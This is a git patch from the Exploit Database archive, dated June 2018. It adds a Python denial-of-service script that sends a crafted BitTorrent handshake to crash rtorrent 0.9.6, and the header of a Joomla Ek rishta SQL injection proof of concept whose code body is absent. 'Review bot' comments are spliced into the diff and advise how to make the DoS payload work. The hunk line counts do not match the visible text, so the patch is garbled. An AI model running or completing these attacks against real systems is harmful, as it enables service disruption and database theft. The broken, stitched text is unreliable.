From 1ccdc79fbda6fe81207c5ce7fbe0c87d8ceeeb44 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 15 Jun 2018 05:01:44 +0000
Subject: [PATCH] DB: 2018-06-15
2 changes to exploits/shellcodes
rtorrent 0.9.6 - Denial of Service
Joomla Component Ek rishta 2.10 - SQL Injection
---
exploits/linux/dos/44894.py | 40 +++++++++++++++++++++++++
exploits/php/webapps/44893.php | 54 ++++++++++++++++++++++++++++++++++
files_exploits.csv | 2 ++
3 files changed, 96 insertions(+)
create mode 100755 exploits/linux/dos/44894.py
create mode 100644 exploits/php/webapps/44893.php
diff --git a/exploits/linux/dos/44894.py b/exploits/linux/dos/44894.py
new file mode 100755
index 000000000..8f29fe04d
--- /dev/null
+++ b/exploits/linux/dos/44894.py
@@ -0,0 +1,40 @@
+# Exploit Title: rtorrent 0.9.6 - Denial of Service
+# Date: 2018-01-10
+# Exploit Author: ecx86
+# Vendor Homepage: http://rtorrent.net
+# Software Link: https://github.com/rakshasa/rtorrent/releases
+# Version: <= 0.9.6
+# Tested on: Debian GNU/Linux 9.4 (stretch)
+
+# This crash is due to a bad bencode parse of the handshake data map.
+# Specifically, by providing a massive length for a string, namely the key of a map entry,
+# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
+# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
+# client, or when a downloading rtorrent client connects to a malicious peer.
+
+#!/usr/bin/env python
+import socket
+import struct
+
+crash = ''
+proto_name = 'BitTorrent protocol'
+crash += chr(len(proto_name)) + proto_name # magic
+crash += '00000000' # reserved extension bytes
+
+# sha1 hash of info dictionary
+# change this depending on your torrent
+crash += '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
+
+crash += '00000000000000000000' # peer id
+
+msg = ''
+msg += struct.pack('I', len(msg))
+crash += msg
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('1.3.3.7', 6890))
+s.send(crash)
+s.close()
\ No newline at end of file
diff --git a/exploits/php/webapps/44893.php b/exploits/php/webapps/44893.php
new file mode 100644
index 000000000..d8876fe9c
--- /dev/null
+++ b/exploits/php/webapps/44893.php
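Review bot: As the hunk stands, `msg` is still empty when `struct.pack('I', len(msg))` runs, so after the 68-byte handshake the script only sends a four-byte zero length prefix (a peer-wire keep-alive), not the oversized bencoded string the header comments describe; the hunk header declares 40 added lines while only 37 are visible here, so the extended-handshake payload may have been lost in rendering and should be checked against the original file. Independently of that, `'I'` packs in native byte order and size, whereas the BitTorrent length prefix is a 4-byte big-endian integer, so the line should read `msg = struct.pack('>I', len(msg)) + msg` once a real message is built (and under Python 3 `crash` must be `bytes`, since `s.send` rejects `str`). The reserved field is written as eight ASCII `'0'` characters (0x30) rather than zero bytes; if I recall BEP 10 correctly, 0x30 in byte 5 happens to set the extension-protocol bit, so if that is deliberate it deserves a comment, and if zeros were intended it should be `'\x00' * 8`. The `#!/usr/bin/env python` line sits after the header comments and is therefore inert; moving it to line 1 would make the file directly executable as its 100755 mode suggests.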
@@ -0,0 +1,54 @@
+# Title: SQL Injection Joomla Component Ek rishta 2.10 - SQL Injection
+# Date: 2018-06-14
+# Exploit Author: Guilherme Assmann
+# Vendor Homepage:https://www.joomla.org/
+# Version: 2.10
+# Tested on: MacOSX, Safari, Chrome
+# Download: https://extensions.joomla.org/extension/ek-rishta/
+# CVE: CVE-2018-12254
+
+# Vulnerability Description
+# To exploit this vulnerability, the user must be logged on to the platform!
+# the vulnerability allows SQL Injection via the
+# PATH_INFO to a home/requested_user/Sent%20interest/[username] URI.
+# more information(en):
+# https://fireshellsecurity.team/cve-2018-12254-sql-injection-joomla-component/
+# more information(pt-br): https://m4k4br0.github.io/sql-injection-joomla-component/
+# more information: https://desecsecurity.com/
+# exploit code to dump tables:
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c72dd1eb3..555276b74 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
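Review bot: The PoC body is not present in this hunk as rendered: after `# exploit code to dump tables:` there are only two empty added lines before `\ No newline at end of file`, although the hunk header declares 54 added lines, so the actual PHP block that performs the dump should be verified against the original file rather than from this view. The header lists `# Vendor Homepage:https://www.joomla.org/` for a third-party component whose own listing is the `Download:` line; pointing Vendor Homepage at the component author, or at least at the extensions.joomla.org entry, avoids implying Joomla core is affected. The `# Title:` line repeats "SQL Injection" at both ends; `# Title: Joomla Component Ek rishta 2.10 - SQL Injection` matches the CSV description added in the same commit. Since the description says a logged-in user is required, a one-line `# Privileges required: authenticated user` header next to the CVE would make that precondition visible at a glance.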
@@ -5998,6 +5998,7 @@ id,file,description,date,author,type,platform,port
 44861,exploits/multiple/dos/44861.html,"WebKit - Use-After-Free when Resuming Generator",2018-06-08,"Google Security Research",dos,multiple,
 44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
 44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
+44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39552,3 +39553,4 @@ id,file,description,date,author,type,platform,port
 44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
+44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,